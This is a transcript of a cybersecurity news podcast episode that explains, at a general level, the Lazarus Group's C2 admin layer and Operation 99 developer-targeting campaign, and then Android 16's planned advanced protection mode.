Security researchers have found some admin layer. For the Lazarus group. If you’re not aware of them, they are North Korea’s threat actors. And there’s kind of some interesting information behind that, as well as some good news, we have what looks like some more protections in Android to kind of mirror some of iOS is security measures.
Let’s talk about it in today’s episode. Today we are facing an unprecedented array of data breaches, hacking attempts, and surges in digital crime. Why is there such a widespread amount, and how little is noticed in our everyday lives? Malware, dark sites, brute forcing, zero day script kiddies, and nation state hackers are all on the rise.
Learn more about the threats we face and gain a bit more knowledge than yesterday. Hey guys, welcome back to another episode. I’m your host, Cipherceval. If you’re on YouTube, if you can please do me the favor and hit that like, subscribe, and bell notification icon. And if you’re on a podcast platform like Apple Podcasts or Spotify, please give us a follow and give us a 5 star rating if you think we deserve it.
So, I have two articles for you today with one kind of supporting article. But we’re talking about Lazarus to give context before we even dive into the article. Lazarus is one of North Korea’s main threat actor groups. One of their main cybersecurity groups. They generally go a lot around crypto, uh, cryptocurrency, and they try to fundraise, right?
North Korea is not exactly the most profitable country in the world when it comes to their normal import exports and their legit above board activities. But where they do seem to be very active is in the cybercrime initiatives. And with that, let’s kind of go over some of the admin layer stuff that was found, what that kind of means for you and where that’s interesting, as well as some more context on them.
So the article is by Dark Reading. Researchers uncover Lazarus Group admin layer for C2 servers. The threat actor is using a sophisticated network of VPNs and proxies to centrally manage command and control servers from Pyongyang. So, to give some context, a C2 server, or a command and control server, is generally what botnets and other kinds of malware were used to understand what they need to do, get resources from, etc.
A lot of the times when you have Either different kinds of payloads that go onto a machine. You don’t have an all in one you can, but a lot of the times lately, you don’t have an all in one threat that gets installed on a victim machine. You have a loader, which then brings in other stuff like different functionalities and modules.
And then from there, it keeps talking to the command control to know how to update itself, where to X fill data to and stuff like that. So if you want to think of it, right, it’s essentially kind of like a. Main headquarters for the malware. Um, an infection can look something like you install the loader.
The loader then reaches out, determines what modules it wants to install and how it can kind of obfuscate its behavior. Then let’s say it installs something like a keylogger module, a cryptocurrency stealing module, and there’s different kind of modules, but let’s, let’s go with those two for now, right?
So the keylogger module gets installed and that starts kind of listening to all your keystrokes and trying to look for passwords and stuff, and then the stealer will look for your cryptocurrency wallets, any kind of cookies or pasted stuff in your paste bin or your, your paste environment, I guess, from control copy and paste, right?
And it’ll then grab those and then it’ll exfiltrate it. Uh, or send it up to the command and control server, which is how they get your data. I’m bringing it up because the researchers found the admin layer or kind of the control. of the command and control servers for the Threat Actor. Going on and into the article.
An ongoing investigation into recent attacks by North Korea’s Lazarus Group on cryptocurrency entities and software developers worldwide has uncovered a hidden administrative layer that the Threat Actor has been using to centrally manage the campaign’s command and control infrastructure, its C2 infrastructure.
The investigation by researchers at Security Scorecard showed Lazarus using the newly discovered infrastructure to maintain direct oversight over compromised systems, control payload delivery on them, and efficiently manage exfiltrated data, significantly. The threat actor is using the same web based admin platform in other campaigns, including one involving the impersonation of IT workers the security vendor found.
So, the significance of this, right? They’ve essentially covered, they’ve essentially uncovered the brains behind the C2 infrastructure, right? Every botnet, a lot of malware, there’s always a C2 infrastructure that has to be there because you need some kind of control. Granted, you have stuff like Worms, that their whole thing is just Spread and destroy but a lot of things especially the more recent sophisticated attacks have some kind of c2 infrastructure think ransomware, right?
The ransomware has to talk to somewhere to let them know an infection has occurred and then to you know Be able to communicate for decryption and payment and stuff like that and the commands can get sent for you know Decrypting or etc or destroying data or X filling certain kind of data We’ve been seeing that more the ransomware Not that Lazarus, right now we’re talking about ransomware, they’re much more in the cryptocurrency game, but to give kind of the context there.
Now, elaborate operational security, though the threat actor has implemented elaborate operational security measures to try and evade attribution, security scorecards said it was able to tie the campaign and infrastructure to North Korea with a high degree of confidence. Anytime you’re talking about cyber security or the cyber world, attribution is a major thing among threat actors, because when you attribute an attack, you’re essentially saying, hey, we have a high degree of confidence that this threat actor, and that’s significant, right?
Because if you think about it, what country wants to take fault for some cyber attack, which is ultimately a crime? What country wants to willfully take that blank? So, they want to make it look like some other country is the one doing an attack. Of course, North Korea would want either China, or Russia, or Brazil, or one of the other countries that have different cyber operations.
Not too sure about Brazil’s cyber threats, but, you know, we usually talk about Russia and China a lot. But what if we could make their threat actors be the ones to take the fall for North Korea? So that’s kind of what happens, is you don’t want, or threat actors don’t want, the attribution to go to them.
Why? Because what country wants to say, yeah, we hacked you, sorry. It, it’s just better to kind of stay in the shadows for a lot of this stuff. The analysis makes it evident that Lazarus was orchestrating a global operation targeting the cryptocurrency industry and developers worldwide. Security Scorecard said in a report this week, The campaigns resulted in hundreds of victims downloading and executing the payloads.
Well, in the background, the exfiltrated data was being siphoned back to Pyongyang again when we’re talking about different campaigns and specifically what Lazarus likes to do is they tend to stealers, right? Because North Korea doesn’t have a very robust trade infrastructure with other countries, you know, they’re kind of, they’re not exactly the most above board legitimate kind of, you know, country.
Because of that, they do a lot of cybercrime to try to fund their operations, fund their missile programs, etc. And cryptocurrency just so happens to be the kind of money that you don’t need to pass through something like a central bank. Cryptocurrency by itself Is decentralize right and the beautiful part about that for everyday people is it’s harder to sensor it’s easier to exchange there’s less kind of bureaucracy around it but the really beneficial part for cyber criminals is it’s distributed there’s no one to control it and it’s.
You know, somewhat easy to steal if you know how, and that’s what we’re seeing threat actors like Lazarus doing. They’re stealing money. Now, a security scorecard discovered Phantom Circuit, the name by which it is tracking Lazarus Group’s newly discovered admin layer, while conducting follow up investigations involving Operation 99, a malicious campaign that it recently uncovered.
Targeting the cryptocurrency industry and developers globally. So here’s where I’m going to kind of pause this article for a second. We’ll come back in a minute. There is an article by security scorecard actually talking about operation 99. Which is something I thought was really cool. And I thought you guys would kind of benefit from getting that context.
Now operation 99, according to the security scorecard article called operation 99 North Korea, cyber assault on software developers. You have essentially the Lazarus group, not only trying to do Steelers or info Steelers and different malware, but they’re also trying to kind of do some social engineering by taking advantage of developers and kind of the trust.
And just kind of the position that developers find themselves in. So, on January 9th, the Security Scorecard Strike Team uncovered Operation 99, a cyber attack by the Lazarus Group, North Korea’s state sponsored hacking unit. The campaign targets software developers looking for freelance Web3 and cryptocurrency work.
If you thought fake job offers from the group’s Operation Dream Job campaign were bad, This latest move is a masterclass in deception, sophistication, and malicious intent. So I’m not too familiar with operation dream job. There’s always a million things happening and it’s hard to keep up with everything, which is why I’m here talking about it.
Um, now for those of you who are listening and not watching the screen, whether on the podcast or if you have the YouTube video in the background, um, they do show a map of the world with the victims. And interestingly enough, it seems like Italy is kind of one of the highest. It looks like 137 victims have been hit for for this for this campaign from Lazarus.
So why software developers? Why now? I will kind of sum up what happened for you. I won’t go through the article so we can switch back to the other one. But Operation 99. Is essentially a way to have Web3 cryptocurrency developers download a malicious open source repository. And that open source repository is what actually has the malicious payload that connects to the command and control servers, downloads malware, and does really nasty stuff to the developers.
Now, for those of you who are listening who maybe you’re an analyst, maybe you’re just curious about cyber security, maybe you just like listening to this kind of stuff and you have a completely different job, doesn’t matter. The. Important of it. The importance of it is developers tend to have a lot of trust when it comes to software.
And what I mean by that is developers will go to get hub and get lab and other repositories, and they will download a piece of code because it can help them do something complicated. When you start thinking about time zone libraries, when you start thinking about file manipulation, when you start thinking about stuff like rendering maps or anything, You get into some really complicated stuff, and sometimes it’s just better to download something that’s already been tried, tested, and bug checked, right?
If you’re very used to writing, say, code for data pipelines, and all of a sudden you need to go write this Solidity thing, which is one of the Web 3, um, frameworks that runs off Ethereum, then you may not know. So you start to download a bunch of different things and a bunch of different packets, and that’s where they’re kind of taking advantage of this.
There is in software, the idea of a supply chain attack. And just like in the real world, whenever you affect supply chain, you kind of affect everything down the line. So if you can have a developer, who’s maintaining this obscure library that maybe everyone downloads, but no one really understands, and there’s a lot of them or a library that’s very niche or very useful or a wrapper, there’s a million different kinds of libraries that get installed.
If you can get that one developer who has that one library that’s used everywhere and he’s probably been writing it in his free time, he or she has been writing in their free time and they get infected and you have a bunch of kind of things that come with that in a supply chain attack because they get infected.
If that gets released, then anyone who’s installed gets infected. And you can kind of see where that goes down, right? So now a company that hasn’t been hacked because they have a software that’s been backdoored and that software got backdoored because of a library that got maliciously exploited unintentionally, you now have access to a huge amount of victims.
Now I’m talking about this because the Lazarus group seems to be kind of going in that direction. Now, part of this is that they’re trying to steal crypto from the web three developers, but there have a foothold in what eventually could be a pivot to supply chain attacks. And I find that just very concerning.
Now there’s some funny things like the C2 servers are hosted by Stark Industries, LLC. Uh, which if, uh, there’s any Marvel fans, you know, Stark Industries. Um, but the one thing I found kind of cool and interesting is they’re using heavily obfuscated Python scripts. I find that interesting because Python is still not a super ubiquitous language.
It’s much more ubiquitous than it was, say, five years ago, ten years ago. Especially with everyone using it as kind of like their first language in university. Which I have my own opinions on. I did several years of C before I ever moved on to other different kinds of language. And I kind of like that method.
But hey, everyone to their own. So, they’re using obfuscated Python scripts, which essentially means you have a Python program that has a bunch of jumbled up, uh, wording and other stuff so you can’t tell what it’s doing right away. And they tend to do some really cool, um, dynamically adjusting of the malware.
All this to kind of say, That not only are they trying to be elusive, not only are they stealing cryptocurrency from just people who are into crypto, but they’re also trying to hit the developers. And when you try to hit the developers, that’s where the damage could be amplified greatly. Again, because you’re looking at supply chain attacks, you’re looking at what kind of information do they have, where are they, and stuff like that.
Jumping back to the Dark Reading article that we were talking about, um, Victims who fall for the scams are directed to clone a seemingly benign but harmful open source GitHub repository. The cloned repository connects to Lazarus Group’s C2 infrastructure, which the threat actor has been using to sneak data, stealing malware, into the victim’s environment.
As part of the campaign, Lazarus Group has been inserting obfuscated backdoors into legitimate software products. Including authentication apps and cryptocurrency software and trying to trick developers into running them in their environments. Security scorecard estimates that more than 230 victims have downloaded the malicious payloads in the North Korea threat actors latest campaign.
Again, this is where there’s a bunch of red. Red alerts red alarms going off a man right if they’re doing these kinds of you know they have back doors they’re trying to get into supply chains and other apps to try to get stealers into different corporate environments that’s insane. Because they’re moving from a steel crypto to a try to get more than just valuable stuff, right?
If you can steal, um, things like configurations, you can look for vulnerabilities and now you have somewhat of a zero day, even though it’s not a bug in the code, it’s a, you know, a problem with the infrastructure setup, you can have them steal proprietary code and other data. Right? So they could make clones.
Of legitimate softwares. And then you also have the aspect of, well, if they can steal information and other access, that’s also valuable in and of itself. Now, the motivation is two fold. Cryptocurrency theft and infiltration of corporate networks. Ryan Cherstobitov, Senior Vice President of Threat Intelligence at Security Scorecard says, More often than not, developers who fall victim to Lazarus Group lures end up executing the clone code on their corporate devices and in their work environments.
The payloads are designed to exfiltrate development secrets. You have a lot of companies that are very protective of their secret sauce, of how the program is written, of how their infrastructure is set up. And for good reason, right? Sometimes the differentiation between company and company B is that they have a better infrastructure set up.
They both have similar functionality, similar features, but maybe company 10 times the amount of load as company B. And that’s more than just code that goes into the way that the code is also dealing with environments. Right. Um, I won’t bore you with the technical details right now, but you have stuff like microservices.
You have, of course, cloud technologies, but then you also have things like the ability to ramp up multiple instances, which is something you’ve seen that AWS and other cloud providers. And what that ultimately means, right, is You have code that can create copies of itself to do a piece of work. And then you spend that up 10, 20, 30 times, whatever, how many times the system can scale, and it does that much more work and it’s more powerful than say something like multi threading, which is one program can do multiple things at once you can essentially scale horizontally.
Which means you can have computer A, computer B, computer C, computer D, computer E, all running the software. So now you have more computers coming online, and it’s easier to scale horizontally than it is vertically because you can only give so much CPU and RAM on a single machine. There is limitations to processors and RAMs, versus if you do it horizontally, you just keep adding machines and then you can create pipelines and stuff.
Now, I’m saying that because if company A has a sophisticated setup like that and company B does not, well, now North Korea can turn around and pretty much copy them and do whatever they want to to create a clone of it if they wanted to go down that direction. The more information they have, the scarier they can be.
Now, security scorecard researchers found that Lazarus members using Astro VPNs to connect an intermediate proxy network registered with a freight company in Hassan, Russia. They then use proxy network to connect to Operation 99 C2 infrastructure in an elaborate attempt to try to hide their tracks. The C2 servers themselves were hosted on infrastructure registered with the most likely fictional Stark Industries LLC.
So going back to what I was saying about attribution, right? If they’re trying to set themselves up to operate out of Russia, they might be trying to make it look like a Russian threat actor are the ones doing these attacks, when in reality it’s the North Korea threat actors. Cyber, uh, security scorecard assesses with a high confidence that the IPs used to connect to the C2s were merely a relay proxy and used to obfuscate the true origin.
The company wrote in its report this week, the adversary was establishing a secondary session after connecting to the VPN with the proxy. So they were using a VPN to connect to Russia. And then Russia was then using a proxy to go somewhere else, right? So you’re kind of doing like a hop, a chain hopping effect.
And you do this because now there’s more places where you’d have to go and pull logs from and do all this other stuff. Versus you at home, if you access google. com, and you’re not using a VPN or a proxy or anything, Google can see the origin IP. Through the net traffic. And the more you do hops, the harder it is to necessarily track that because now they have a VPN going into this computer over here.
This computer over here is then using a proxy to send a request. Now that’s different from just proxy to proxy because a proxy afford proxy will sometimes just manipulate the packet to resend it somewhere else. Now, by doing a VPN, if they’re logging into another computer, they’re essentially accessing A different system somewhere else.
And then if they’re accessing a proxy from there, then then bouncing that traffic to somewhere else. Again, there’s a lot of things you can do to hide your traffic. There’s still ways to find it. There’s time attacks and other things, but the more complications you add, the harder it is to do it without having some really high level access or, you know, some sophisticated access think governments, uh, with access to infrastructure, logs, and other stuff, assuming logs are even being kept.
Now, Phantom Circuit is the operational network behind the scenes that leads directly back to Pyongyang. Shersto Bitov says, it is also the same proxy network he adds that Lazarus used in another campaign where members use stolen identities to impersonate IT workers to try and secure jobs at the organizations they want to infiltrate.
Again, Lazarus has been at this for a while. They’re heavily known for their cryptocurrency. And they’re heavily known for IT scams and ways to, you know, just get money. Ultimately, the threat actor seems to be extremely, uh, extremely interested in making money. And I don’t blame them, right? North Korea is not exactly a very, a nation flush with a lot of cash.
But that’s it for this dark, dark reading article. Let’s go ahead and jump into the next one by Android Authority. So in an article by Android Authority, here’s how advanced protection mode in Android 16 will protect your data. Now, nothing is ever foolproof, but kudos to Android for trying to put in some more stuff for us to kind of make it safer.
Turning on advanced protection will block side loading and 2G connectivity in Android 16. Now, to give a bit of context before we jump into the article. IOS already has a lot of safety features for their lockdown mode. Now lockdown mode isn’t necessarily something that everyone wants to activate, but if you’re a journalist, a high target official, um, an elected official, someone who hackers may specifically want to target, not because.
They could have money, but because they’re known, right? Think celebrities, think, um, journalists of dissenting countries, think opponents of different regimes. There’s a myriad of reasons why you may be wanting to get, why you may get targeted by cyber security actors or threat actors. And because of that, IOS, a while back, introduced a lockdown mode.
Google did something for Android back in 2017, the article touches on that. But now it seems like they’re rolling out even more stuff for that in Android 16, which is one of the upcoming Android operating system versions. If you believe you’re at high risk of being targeted by hackers, or you desire an additional layer of security, you can enroll in Google’s Advanced Protection Program.
The program improves security by requiring you to use a security key or passkey to sign into your Google account. Blocking you from downloading harmful files and more enrolled users also benefit from beefed up security on their Android devices with Android 16, introducing further security enhancements.
I will save you the whole article. And I’m just going to touch on some pieces of that. That was really cool. So in 2017, Google introduced the advanced protection program, which allowed different things to kind of happen on the device, but ultimately it was. A way for those at high risk of being hacked to try to minimize their risks.
One way you can do that is by preventing apps from being installed from outside the Google Play Store. Now, for my iOS users or for my Android users who only use the Play Store, there is other stuff like F Droid and other ways that you can essentially load up different applications on your device. Now, you may be wondering, why do you want to do that?
Well, There’s a lot of reasons, um, but sometimes it really isn’t as simple as you want to get, uh, an app that isn’t on the Play Store. And F Droid and these other ones are different marketplaces that allow you to do that. Now, there’s ultimately a lot of things you can do with Android, and side loading kind of makes that possible.
But, on the negative side, side loading is also a way that threat actors have been loading up malware on unsuspected Android devices. Because the sideload bypasses the Google Play Store, you’re no longer relying on Google in scanning that app and hopefully catching any malicious activity that could be happening.
And that Android that you’re signing the APK or the application that you’re sideloading may not do what you think or may not do what you want it to do. And with the new 20, with the new Android 16, this is one of the things that is kind of cool. Now, the article states that when examining Android 16 beta one, they discovered how to manually enable it.
I’ll kind of go, I’ll put the article in the link if you want to go look how. But the cool part is that you can manually enable the mode. And then you have stuff like allow from this source to install an app and it’s great out and gives you a prevented by advanced protection notice. This is really cool for those who want to put it on because now it’s just another piece of mind, right?
You’re not going to be able to have something siloed because it blocks it completely. It’s no longer just oh well I’m being careful No device or no app could sideload anything either because it’s been blocked by the operating system Another cool thing is that the advanced protection mode will prevent 2g connectivity 2G is one of the older methods of cell towers, right?
So, you know, 3G, you know, 4G, you know, 5G, 2G is older and has been sunsetted in most places. But most devices have no need to access to, for a 2G network. But there is an attack, a cyber attack, where if you can trick a device to going down to a 2G network, you can essentially access a traffic. I think it’s pretty much plain text.
And you can intercept and monitor traffic. Like if it was just an open HTTP connection, as far as I remember. And the cool part is that with Android 16, it’s no longer going to allow 2g connections to occur. Because again, most two G’s all over the world should be pretty much discontinued, right? I think even 3g got discontinued and everyone is mostly on 4g for North America.
I’m not sure about Europe and those counterparts. And one of the other cool parts about Android 16 protection mode is something called memory tagging extension. And it essentially helps protect against memory safety bugs, which can occur, and is one of the more common vulnerabilities in the Android ecosystem.
Um, now, all this to say, the advanced protection program does have trade offs, like, you know, potential performance impacts, and a bit more clunky, right? If you’re trying to sideload something, well, guess what? You can’t. You’re 100 percent relying on the Play Store. Which is something that a lot of iOS users are not super happy about, because they can’t get certain apps, or Because they’re locked down to the Apple ecosystem.
But again, trade offs. Now it is important to note this. I will read this last article or this last paragraph. Google hasn’t formally announced this new advanced protection mode. So it’s inclusion in the final Android 16 release isn’t guaranteed. Given the evidence we compiled though, we likely think it’ll make it in.
Blocking 2G and enabling MTE, or the Memory Tagging Extension, are valuable enhancements, but Android Protection Mode’s true potential lies in the new API, which will allow apps to check enrollment status and implement further security measures. This effectively transforms the advanced protection program into a one click solution for enhancing the security of not only your Google account, but also any participating Android apps.
And here’s where I find it cool. So for my developers who are listening, this is really cool because now you can check if a user is in this advanced protection mode. You know that the user who’s using your app is probably being targeted. So you can do things like double checking the environment. You can do things like making sure everything’s fully encrypted.
You’re not putting any secrets or anything out that could expose. And there’s just a lot of different things you can do, but. It’s cool for the IT admins who are listening because now you have a more centralized location to try to lock down the device in question. I know a lot of IT admins kind of stress over devices because if the device gets compromised or lost, they could have access into the network, right?
A lot of employees will have access to email, maybe they have a VPN or something else installed that lets them access the network. I know there’s a lot of devices or device policies that allow and A corporation or an entity to essentially remote lock and wipe a device. But this is just another layer that makes it harder to do anything because now you’d have to physically steal the device, right?
It’s no longer that you sideloaded something and got access to the device that way. But guys, I thought these were cool. I wanted to bring it up with you. Um, ultimately security is. Sometimes only as good as the person and in other times it’s as good as the tech because in this in this place They’re kind of forcing you to do stuff to protect yourself.
But again, we’ll see if this comes out in Android 16 This has been your host Cipherceval. Thank you for tuning in and I’ll catch you in the next one!
Note: This is a transcript of the episode.
๐ข Connect with us:
Newsletter: https://follow.exploitbrokers.com
Twitter: @ExploitBrokers
Medium: https://medium.com/@exploitbrokers
TikTok: https://www.tiktok.com/@exploitbrokers
๐ References & Sources
- Lazarus C2 Infrastructure: https://www.darkreading.com/cyberattacks-data-breaches/researchers-uncover-lazarus-admin-layer-c2-servers
- Operation 99: https://securityscorecard.com/blog/operation-99-north-koreas-cyber-assault-on-software-developers/
- Advanced Protection Mode: https://www.androidauthority.com/android-16-advanced-protection-mode-3518368/
Leave a Reply